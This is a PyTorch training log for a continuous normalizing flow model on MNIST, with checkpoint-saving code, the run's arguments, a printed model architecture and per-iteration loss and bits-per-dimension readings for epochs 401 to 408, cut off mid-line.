\"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"current_checkpt.pth\"))\n \n if loss_nll < best_loss_nll:\n best_loss_nll = loss_nll\n utils.makedirs(args.save)\n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"best_nll_checkpt.pth\"))\n \n if args.conditional:\n if error_score < best_error_score:\n best_error_score = error_score\n utils.makedirs(args.save)\n torch.save({\n \"args\": args,\n \"state_dict\": model.module.state_dict() if torch.cuda.is_available() else model.state_dict(),\n \"optim_state_dict\": optimizer.state_dict(),\n \"epoch\": epoch,\n \"iter\": itr-1,\n \"error\": error_score,\n \"loss\": loss,\n \"xent\": loss_xent,\n \"bits_per_dim\": loss_nll,\n \"best_bits_per_dim\": best_loss_nll,\n \"best_error_score\": best_error_score,\n \"epoch_time\": time_epoch_meter.val,\n \"epoch_time_avg\": time_epoch_meter.avg,\n \"time\": test_time_spent,\n \"error_train\": error_meter.avg,\n \"loss_train\": loss_meter.avg,\n \"xent_train\": xent_meter.avg,\n \"bits_per_dim_train\": nll_meter.avg,\n \"total_time_train\": tt_meter.avg,\n \"time_train\": time_meter.avg,\n \"nfe_train\": steps_meter.avg,\n \"grad_train\": grad_meter.avg,\n }, os.path.join(args.save, \"best_error_checkpt.pth\"))\n \n\n # visualize samples and density\n with torch.no_grad():\n fig_filename = os.path.join(args.save, \"figs\", \"{:04d}.jpg\".format(epoch))\n utils.makedirs(os.path.dirname(fig_filename))\n generated_samples = model(fixed_z, reverse=True).view(-1, *data_shape)\n save_image(generated_samples, fig_filename, nrow=10)\n writer.add_images('generated_images', generated_samples.repeat(1,3,1,1), epoch)\n\nNamespace(JFrobint=None, JdiagFrobint=None, JoffdiagFrobint=None, add_noise=True, alpha=1e-06, atol=0.0001, autoencode=False, batch_norm=False, batch_size=8000, batch_size_schedule='', begin_epoch=1, conditional=False, controlled_tol=True, conv=True, data='mnist', dims='64,64,64', divergence_fn='approximate', dl2int=None, imagesize=None, l1int=None, l2int=None, layer_type='concat', log_freq=1, lr=0.0001, max_grad_norm=10000000000.0, multiscale=True, nonlinearity='softplus', num_blocks=2, num_epochs=1000, parallel=False, rademacher=True, residual=False, resume='../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1/epoch_400_checkpt.pth', rtol=0.0001, save='../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1', seed=0, solver='dopri5', spectral_norm=False, spectral_norm_niter=10, step_size=None, strides='1,1,1,1', test_atol=None, test_batch_size=5000, test_rtol=None, test_solver=None, time_length=1.0, time_penalty=0, train_T=True, train_mode='semisup', val_freq=1, warmup_iters=113.0, weight_decay=0.0, weight_y=0.5)\nODENVP(\n (transforms): ModuleList(\n (0): StackedCNFLayers(\n (chain): ModuleList(\n (0): LogitTransform()\n (1): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(2, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 1, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (2): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(2, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 1, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (3): SqueezeLayer()\n (4): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (5): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n )\n )\n (1): StackedCNFLayers(\n (chain): ModuleList(\n (0): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 2, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (1): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 2, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (2): SqueezeLayer()\n (3): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(9, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 8, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (4): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(9, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 8, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n )\n )\n (2): StackedCNFLayers(\n (chain): ModuleList(\n (0): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n (1): CNF(\n (odefunc): RegularizedODEfunc(\n (odefunc): ODEfunc(\n (diffeq): ODEnet(\n (layers): ModuleList(\n (0): ConcatConv2d(\n (_layer): Conv2d(5, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (1): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (2): ConcatConv2d(\n (_layer): Conv2d(65, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n (3): ConcatConv2d(\n (_layer): Conv2d(65, 4, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n )\n )\n (activation_fns): ModuleList(\n (0): Softplus(beta=1, threshold=20)\n (1): Softplus(beta=1, threshold=20)\n (2): Softplus(beta=1, threshold=20)\n )\n )\n )\n )\n )\n )\n )\n )\n (project_ycond): LinearZeros(in_features=10, out_features=1568, bias=True)\n (project_class): LinearZeros(in_features=784, out_features=10, bias=True)\n)\nNumber of trainable parameters: 828890\n===> Using batch size 8000. Total 7 iterations/epoch.\n/tancode/repos/tan-ffjord/lib/layers/odefunc.py:286: UserWarning: To copy construct from a tensor, it is recommended to use sourceTensor.clone().detach() or sourceTensor.clone().detach().requires_grad_(True), rather than torch.tensor(sourceTensor).\n t = torch.tensor(t).type_as(y)\nIter 4777 | Time 79.9624(41.4948) | Bit/dim 1.0868(1.1031) | Xent 0.0000(0.0000) | Loss 1.0868(1.1031) | Error 0.0000(0.0000) Steps 440(439.16) | Grad Norm 5.3272(5.4877) | Total Time 10.00(10.00)\nIter 4778 | Time 42.8698(41.5360) | Bit/dim 1.0966(1.1029) | Xent 0.0000(0.0000) | Loss 1.0966(1.1029) | Error 0.0000(0.0000) Steps 440(439.19) | Grad Norm 5.2102(5.4793) | Total Time 10.00(10.00)\nIter 4779 | Time 39.9048(41.4871) | Bit/dim 1.0875(1.1025) | Xent 0.0000(0.0000) | Loss 1.0875(1.1025) | Error 0.0000(0.0000) Steps 440(439.21) | Grad Norm 4.2762(5.4432) | Total Time 10.00(10.00)\nIter 4780 | Time 40.9003(41.4695) | Bit/dim 1.0854(1.1020) | Xent 0.0000(0.0000) | Loss 1.0854(1.1020) | Error 0.0000(0.0000) Steps 434(439.06) | Grad Norm 2.4837(5.3544) | Total Time 10.00(10.00)\nIter 4781 | Time 41.2973(41.4643) | Bit/dim 1.0830(1.1014) | Xent 0.0000(0.0000) | Loss 1.0830(1.1014) | Error 0.0000(0.0000) Steps 440(439.09) | Grad Norm 0.5396(5.2100) | Total Time 10.00(10.00)\nIter 4782 | Time 41.6717(41.4705) | Bit/dim 1.0849(1.1009) | Xent 0.0000(0.0000) | Loss 1.0849(1.1009) | Error 0.0000(0.0000) Steps 446(439.29) | Grad Norm 3.0382(5.1448) | Total Time 10.00(10.00)\nIter 4783 | Time 42.1132(41.4898) | Bit/dim 1.0836(1.1004) | Xent 0.0000(0.0000) | Loss 1.0836(1.1004) | Error 0.0000(0.0000) Steps 440(439.31) | Grad Norm 5.1449(5.1448) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0401 | Time 25.6615, Epoch Time 367.3428(311.8699), Bit/dim 1.0801(best: inf), Xent 0.0000, Loss 1.0801, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4784 | Time 42.6511(41.5247) | Bit/dim 1.0819(1.0998) | Xent 0.0000(0.0000) | Loss 1.0819(1.0998) | Error 0.0000(0.0000) Steps 440(439.33) | Grad Norm 5.3156(5.1500) | Total Time 10.00(10.00)\nIter 4785 | Time 39.9158(41.4764) | Bit/dim 1.0842(1.0994) | Xent 0.0000(0.0000) | Loss 1.0842(1.0994) | Error 0.0000(0.0000) Steps 440(439.35) | Grad Norm 3.7940(5.1093) | Total Time 10.00(10.00)\nIter 4786 | Time 39.6629(41.4220) | Bit/dim 1.0836(1.0989) | Xent 0.0000(0.0000) | Loss 1.0836(1.0989) | Error 0.0000(0.0000) Steps 434(439.19) | Grad Norm 1.5402(5.0022) | Total Time 10.00(10.00)\nIter 4787 | Time 39.1784(41.3547) | Bit/dim 1.0808(1.0983) | Xent 0.0000(0.0000) | Loss 1.0808(1.0983) | Error 0.0000(0.0000) Steps 440(439.22) | Grad Norm 0.6854(4.8727) | Total Time 10.00(10.00)\nIter 4788 | Time 39.5525(41.3006) | Bit/dim 1.0827(1.0979) | Xent 0.0000(0.0000) | Loss 1.0827(1.0979) | Error 0.0000(0.0000) Steps 434(439.06) | Grad Norm 2.0887(4.7892) | Total Time 10.00(10.00)\nIter 4789 | Time 40.6804(41.2820) | Bit/dim 1.0831(1.0974) | Xent 0.0000(0.0000) | Loss 1.0831(1.0974) | Error 0.0000(0.0000) Steps 440(439.09) | Grad Norm 2.8874(4.7321) | Total Time 10.00(10.00)\nIter 4790 | Time 40.0694(41.2456) | Bit/dim 1.0836(1.0970) | Xent 0.0000(0.0000) | Loss 1.0836(1.0970) | Error 0.0000(0.0000) Steps 434(438.94) | Grad Norm 3.0377(4.6813) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0402 | Time 14.6854, Epoch Time 308.9901(311.7835), Bit/dim 1.0769(best: 1.0801), Xent 0.0000, Loss 1.0769, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4791 | Time 39.8783(41.2046) | Bit/dim 1.0776(1.0964) | Xent 0.0000(0.0000) | Loss 1.0776(1.0964) | Error 0.0000(0.0000) Steps 434(438.79) | Grad Norm 2.7450(4.6232) | Total Time 10.00(10.00)\nIter 4792 | Time 39.5570(41.1552) | Bit/dim 1.0837(1.0960) | Xent 0.0000(0.0000) | Loss 1.0837(1.0960) | Error 0.0000(0.0000) Steps 434(438.65) | Grad Norm 1.9924(4.5443) | Total Time 10.00(10.00)\nIter 4793 | Time 39.0073(41.0908) | Bit/dim 1.0812(1.0956) | Xent 0.0000(0.0000) | Loss 1.0812(1.0956) | Error 0.0000(0.0000) Steps 434(438.51) | Grad Norm 0.9241(4.4357) | Total Time 10.00(10.00)\nIter 4794 | Time 40.1371(41.0621) | Bit/dim 1.0794(1.0951) | Xent 0.0000(0.0000) | Loss 1.0794(1.0951) | Error 0.0000(0.0000) Steps 440(438.55) | Grad Norm 0.6729(4.3228) | Total Time 10.00(10.00)\nIter 4795 | Time 39.7098(41.0216) | Bit/dim 1.0848(1.0948) | Xent 0.0000(0.0000) | Loss 1.0848(1.0948) | Error 0.0000(0.0000) Steps 440(438.59) | Grad Norm 1.7930(4.2469) | Total Time 10.00(10.00)\nIter 4796 | Time 39.1525(40.9655) | Bit/dim 1.0797(1.0944) | Xent 0.0000(0.0000) | Loss 1.0797(1.0944) | Error 0.0000(0.0000) Steps 434(438.46) | Grad Norm 2.4171(4.1920) | Total Time 10.00(10.00)\nIter 4797 | Time 41.0335(40.9675) | Bit/dim 1.0840(1.0940) | Xent 0.0000(0.0000) | Loss 1.0840(1.0940) | Error 0.0000(0.0000) Steps 434(438.32) | Grad Norm 2.3729(4.1374) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0403 | Time 15.0100, Epoch Time 306.0938(311.6128), Bit/dim 1.0760(best: 1.0769), Xent 0.0000, Loss 1.0760, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4798 | Time 39.3595(40.9193) | Bit/dim 1.0822(1.0937) | Xent 0.0000(0.0000) | Loss 1.0822(1.0937) | Error 0.0000(0.0000) Steps 434(438.19) | Grad Norm 1.6570(4.0630) | Total Time 10.00(10.00)\nIter 4799 | Time 39.9845(40.8913) | Bit/dim 1.0801(1.0933) | Xent 0.0000(0.0000) | Loss 1.0801(1.0933) | Error 0.0000(0.0000) Steps 434(438.07) | Grad Norm 0.6266(3.9599) | Total Time 10.00(10.00)\nIter 4800 | Time 40.0981(40.8675) | Bit/dim 1.0822(1.0929) | Xent 0.0000(0.0000) | Loss 1.0822(1.0929) | Error 0.0000(0.0000) Steps 434(437.95) | Grad Norm 0.5428(3.8574) | Total Time 10.00(10.00)\nIter 4801 | Time 40.1379(40.8456) | Bit/dim 1.0769(1.0925) | Xent 0.0000(0.0000) | Loss 1.0769(1.0925) | Error 0.0000(0.0000) Steps 434(437.83) | Grad Norm 1.2225(3.7784) | Total Time 10.00(10.00)\nIter 4802 | Time 40.4464(40.8336) | Bit/dim 1.0836(1.0922) | Xent 0.0000(0.0000) | Loss 1.0836(1.0922) | Error 0.0000(0.0000) Steps 440(437.89) | Grad Norm 1.6494(3.7145) | Total Time 10.00(10.00)\nIter 4803 | Time 38.9377(40.7767) | Bit/dim 1.0775(1.0918) | Xent 0.0000(0.0000) | Loss 1.0775(1.0918) | Error 0.0000(0.0000) Steps 434(437.78) | Grad Norm 1.6408(3.6523) | Total Time 10.00(10.00)\nIter 4804 | Time 38.5480(40.7099) | Bit/dim 1.0794(1.0914) | Xent 0.0000(0.0000) | Loss 1.0794(1.0914) | Error 0.0000(0.0000) Steps 434(437.66) | Grad Norm 1.3228(3.5824) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0404 | Time 14.9350, Epoch Time 304.8567(311.4101), Bit/dim 1.0748(best: 1.0760), Xent 0.0000, Loss 1.0748, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4805 | Time 40.8884(40.7152) | Bit/dim 1.0844(1.0912) | Xent 0.0000(0.0000) | Loss 1.0844(1.0912) | Error 0.0000(0.0000) Steps 440(437.73) | Grad Norm 0.7222(3.4966) | Total Time 10.00(10.00)\nIter 4806 | Time 40.1286(40.6976) | Bit/dim 1.0793(1.0908) | Xent 0.0000(0.0000) | Loss 1.0793(1.0908) | Error 0.0000(0.0000) Steps 434(437.62) | Grad Norm 0.2264(3.3985) | Total Time 10.00(10.00)\nIter 4807 | Time 40.7936(40.7005) | Bit/dim 1.0787(1.0905) | Xent 0.0000(0.0000) | Loss 1.0787(1.0905) | Error 0.0000(0.0000) Steps 434(437.51) | Grad Norm 0.8538(3.3222) | Total Time 10.00(10.00)\nIter 4808 | Time 40.6842(40.7000) | Bit/dim 1.0825(1.0902) | Xent 0.0000(0.0000) | Loss 1.0825(1.0902) | Error 0.0000(0.0000) Steps 434(437.41) | Grad Norm 1.2835(3.2610) | Total Time 10.00(10.00)\nIter 4809 | Time 39.6650(40.6690) | Bit/dim 1.0786(1.0899) | Xent 0.0000(0.0000) | Loss 1.0786(1.0899) | Error 0.0000(0.0000) Steps 440(437.48) | Grad Norm 1.3719(3.2043) | Total Time 10.00(10.00)\nIter 4810 | Time 40.8072(40.6731) | Bit/dim 1.0785(1.0895) | Xent 0.0000(0.0000) | Loss 1.0785(1.0895) | Error 0.0000(0.0000) Steps 434(437.38) | Grad Norm 1.0351(3.1392) | Total Time 10.00(10.00)\nIter 4811 | Time 40.1248(40.6567) | Bit/dim 1.0808(1.0893) | Xent 0.0000(0.0000) | Loss 1.0808(1.0893) | Error 0.0000(0.0000) Steps 434(437.28) | Grad Norm 0.4436(3.0584) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0405 | Time 14.8143, Epoch Time 310.3263(311.3776), Bit/dim 1.0745(best: 1.0748), Xent 0.0000, Loss 1.0745, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4812 | Time 40.2127(40.6433) | Bit/dim 1.0810(1.0890) | Xent 0.0000(0.0000) | Loss 1.0810(1.0890) | Error 0.0000(0.0000) Steps 434(437.18) | Grad Norm 0.2043(2.9728) | Total Time 10.00(10.00)\nIter 4813 | Time 39.2422(40.6013) | Bit/dim 1.0791(1.0887) | Xent 0.0000(0.0000) | Loss 1.0791(1.0887) | Error 0.0000(0.0000) Steps 434(437.08) | Grad Norm 0.6918(2.9043) | Total Time 10.00(10.00)\nIter 4814 | Time 41.2052(40.6194) | Bit/dim 1.0831(1.0886) | Xent 0.0000(0.0000) | Loss 1.0831(1.0886) | Error 0.0000(0.0000) Steps 434(436.99) | Grad Norm 0.9521(2.8458) | Total Time 10.00(10.00)\nIter 4815 | Time 39.4357(40.5839) | Bit/dim 1.0788(1.0883) | Xent 0.0000(0.0000) | Loss 1.0788(1.0883) | Error 0.0000(0.0000) Steps 434(436.90) | Grad Norm 0.9375(2.7885) | Total Time 10.00(10.00)\nIter 4816 | Time 39.5827(40.5539) | Bit/dim 1.0822(1.0881) | Xent 0.0000(0.0000) | Loss 1.0822(1.0881) | Error 0.0000(0.0000) Steps 434(436.82) | Grad Norm 0.7569(2.7276) | Total Time 10.00(10.00)\nIter 4817 | Time 38.8800(40.5037) | Bit/dim 1.0776(1.0878) | Xent 0.0000(0.0000) | Loss 1.0776(1.0878) | Error 0.0000(0.0000) Steps 434(436.73) | Grad Norm 0.4229(2.6584) | Total Time 10.00(10.00)\nIter 4818 | Time 40.1105(40.4919) | Bit/dim 1.0803(1.0875) | Xent 0.0000(0.0000) | Loss 1.0803(1.0875) | Error 0.0000(0.0000) Steps 434(436.65) | Grad Norm 0.1529(2.5833) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0406 | Time 14.8095, Epoch Time 305.9392(311.2145), Bit/dim 1.0745(best: 1.0745), Xent 0.0000, Loss 1.0745, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4819 | Time 38.9671(40.4461) | Bit/dim 1.0811(1.0873) | Xent 0.0000(0.0000) | Loss 1.0811(1.0873) | Error 0.0000(0.0000) Steps 434(436.57) | Grad Norm 0.4846(2.5203) | Total Time 10.00(10.00)\nIter 4820 | Time 40.8212(40.4574) | Bit/dim 1.0825(1.0872) | Xent 0.0000(0.0000) | Loss 1.0825(1.0872) | Error 0.0000(0.0000) Steps 434(436.49) | Grad Norm 0.6870(2.4653) | Total Time 10.00(10.00)\nIter 4821 | Time 40.5337(40.4597) | Bit/dim 1.0790(1.0870) | Xent 0.0000(0.0000) | Loss 1.0790(1.0870) | Error 0.0000(0.0000) Steps 440(436.60) | Grad Norm 0.6675(2.4114) | Total Time 10.00(10.00)\nIter 4822 | Time 39.5124(40.4312) | Bit/dim 1.0776(1.0867) | Xent 0.0000(0.0000) | Loss 1.0776(1.0867) | Error 0.0000(0.0000) Steps 434(436.52) | Grad Norm 0.5415(2.3553) | Total Time 10.00(10.00)\nIter 4823 | Time 40.1852(40.4239) | Bit/dim 1.0791(1.0864) | Xent 0.0000(0.0000) | Loss 1.0791(1.0864) | Error 0.0000(0.0000) Steps 434(436.44) | Grad Norm 0.2486(2.2921) | Total Time 10.00(10.00)\nIter 4824 | Time 40.1518(40.4157) | Bit/dim 1.0815(1.0863) | Xent 0.0000(0.0000) | Loss 1.0815(1.0863) | Error 0.0000(0.0000) Steps 434(436.37) | Grad Norm 0.1481(2.2277) | Total Time 10.00(10.00)\nIter 4825 | Time 38.1344(40.3473) | Bit/dim 1.0782(1.0861) | Xent 0.0000(0.0000) | Loss 1.0782(1.0861) | Error 0.0000(0.0000) Steps 434(436.30) | Grad Norm 0.4264(2.1737) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0407 | Time 15.1213, Epoch Time 306.0232(311.0587), Bit/dim 1.0746(best: 1.0745), Xent 0.0000, Loss 1.0746, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4826 | Time 40.6368(40.3559) | Bit/dim 1.0808(1.0859) | Xent 0.0000(0.0000) | Loss 1.0808(1.0859) | Error 0.0000(0.0000) Steps 434(436.23) | Grad Norm 0.5131(2.1239) | Total Time 10.00(10.00)\nIter 4827 | Time 40.3263(40.3551) | Bit/dim 1.0851(1.0859) | Xent 0.0000(0.0000) | Loss 1.0851(1.0859) | Error 0.0000(0.0000) Steps 440(436.34) | Grad Norm 0.5249(2.0759) | Total Time 10.00(10.00)\nIter 4828 | Time 39.4665(40.3284) | Bit/dim 1.0852(1.0859) | Xent 0.0000(0.0000) | Loss 1.0852(1.0859) | Error 0.0000(0.0000) Steps 434(436.27) | Grad Norm 0.3926(2.0254) | Total Time 10.00(10.00)\nIter 4829 | Time 40.6064(40.3367) | Bit/dim 1.0736(1.0855) | Xent 0.0000(0.0000) | Loss 1.0736(1.0855) | Error 0.0000(0.0000) Steps 440(436.39) | Grad Norm 0.1910(1.9704) | Total Time 10.00(10.00)\nIter 4830 | Time 40.1231(40.3303) | Bit/dim 1.0804(1.0853) | Xent 0.0000(0.0000) | Loss 1.0804(1.0853) | Error 0.0000(0.0000) Steps 440(436.49) | Grad Norm 0.1533(1.9159) | Total Time 10.00(10.00)\nIter 4831 | Time 39.0598(40.2922) | Bit/dim 1.0784(1.0851) | Xent 0.0000(0.0000) | Loss 1.0784(1.0851) | Error 0.0000(0.0000) Steps 434(436.42) | Grad Norm 0.3359(1.8685) | Total Time 10.00(10.00)\nIter 4832 | Time 39.0819(40.2559) | Bit/dim 1.0761(1.0849) | Xent 0.0000(0.0000) | Loss 1.0761(1.0849) | Error 0.0000(0.0000) Steps 434(436.35) | Grad Norm 0.3994(1.8244) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0408 | Time 15.0518, Epoch Time 306.9657(310.9359), Bit/dim 1.0741(best: 1.0745), Xent 0.0000, Loss 1.0741, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 4833 | Time 39.6269(40.2370) | Bit/dim 1.0799(1.0847) | Xent 0.0000(0.0000) | Loss 1.0799(1.0847) | Error 0.0000(0.0000) Steps 440(436.46) | Grad Norm 0.4205(1.7823) | Total Time 10.00(10.00)\nIter 4834 | Time 38.0872(40.1725) | Bit/dim 1.0770(1.0845) | Xent 0.0000(0.0000) | Loss 1.0770(1.0845) | Error 0.0000(0.0000) Steps 434(436.38) | Grad Norm 0.2139(1.7352) | Total Time 10.00(10.00)\nIter 4835 | Time 40.8893(40.1940) | Bit/dim 1.0790(1.0843) | Xent 0.0000(0.0000) | Loss 